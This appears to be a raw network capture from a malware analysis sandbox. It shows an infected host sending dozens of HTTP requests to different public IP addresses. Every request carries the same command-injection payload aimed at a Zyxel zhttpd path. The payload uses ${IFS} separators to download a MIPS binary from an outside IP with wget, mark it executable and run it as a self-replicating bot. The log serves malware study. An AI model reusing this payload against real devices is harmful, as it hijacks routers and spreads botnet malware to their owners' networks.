                                                  Jan 19, 2024 18:23:59.122894049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5140192.168.2.1340282106.87.182.23443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.122925997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5141192.168.2.133734849.68.250.236443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.122972012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5142192.168.2.134419270.89.246.182443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.122982979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5143192.168.2.1336852202.2.206.83443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.123058081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5144192.168.2.1333548205.7.99.104443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.123090982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5145192.168.2.135293083.105.68.131443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.123150110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5146192.168.2.1353866148.44.10.69443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.123184919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5147192.168.2.134262839.7.242.42443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.123238087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5148192.168.2.1346642168.138.80.57443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.123259068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5149192.168.2.135779049.185.124.32443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.123306990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5150192.168.2.1341222129.30.1.253443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.123330116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5151192.168.2.1357194159.20.156.255443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.123388052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5152192.168.2.133892090.3.125.146443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.123420954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5153192.168.2.134425051.48.255.1443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.123450041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5154192.168.2.1348658201.33.192.136443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.123500109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5155192.168.2.1341616219.198.196.243443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.123552084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5156192.168.2.1340964206.52.220.237443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.123572111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5157192.168.2.133559087.248.178.237443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.123617887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5158192.168.2.1341640145.53.252.107443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.123672962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5159192.168.2.1336882179.18.178.198443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.123719931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5160192.168.2.1333086173.103.231.201443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.123773098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5161192.168.2.1338336179.28.93.42443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.123792887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5162192.168.2.1347918135.109.107.7443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.123822927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5163192.168.2.1351154122.7.110.163443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.123874903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5164192.168.2.135003454.67.156.89443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.123928070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5165192.168.2.1354968117.136.23.121443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.123955011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5166192.168.2.1344150177.136.15.180443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.124006987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5167192.168.2.1354758155.124.197.232443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.124053001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5168192.168.2.136050031.124.170.118443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.124082088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5169192.168.2.1334610110.73.178.203443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.124135017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5170192.168.2.1348510109.193.98.246443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.124171019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5171192.168.2.135909013.182.63.181443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.124217033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5172192.168.2.1344060103.250.97.44443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.124268055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5173192.168.2.1358510103.161.16.101443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.124305964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5174192.168.2.135602667.153.235.63443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.124346972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5175192.168.2.1359926109.65.179.6443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.124383926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5176192.168.2.1358458213.26.44.35443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.124409914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5177192.168.2.1360058109.144.22.2443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.124454975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5178192.168.2.135801858.85.38.68443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.124505997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5179192.168.2.1338874107.252.34.214443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.124556065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5180192.168.2.136069236.137.105.100443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.124576092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5181192.168.2.1341272212.253.139.203443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.124610901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5182192.168.2.1342456220.32.214.196443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.124653101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5183192.168.2.1344758159.236.186.178443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.124680996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5184192.168.2.1357946176.249.149.99443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.124741077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5185192.168.2.1352312174.162.244.27443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.124768972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5186192.168.2.1360394107.56.50.158443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.124802113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5187192.168.2.1342636113.91.91.204443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.124845028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5188192.168.2.1335398148.115.119.101443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.124880075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5189192.168.2.1355756151.39.246.184443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.124936104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5190192.168.2.1337366148.164.119.41443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.124968052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5191192.168.2.1358140106.58.63.32443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.125000000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5192192.168.2.134602859.198.249.112443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.125039101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5193192.168.2.1333624178.1.70.145443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.125068903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5194192.168.2.1343090157.121.184.200443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.125111103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5195192.168.2.1350168142.55.13.120443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.125149012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5196192.168.2.133499893.168.94.124443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.125189066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5197192.168.2.1345486133.87.126.94443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.125221014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5198192.168.2.1335558113.92.9.37443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.125256062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5199192.168.2.134120850.233.116.97443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.125293016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5200192.168.2.134489486.195.94.228443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.125339985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5201192.168.2.1346938123.79.57.160443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.125377893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5202192.168.2.1333388110.238.169.165443
                                                  TimestampBytes transferredDirectionData
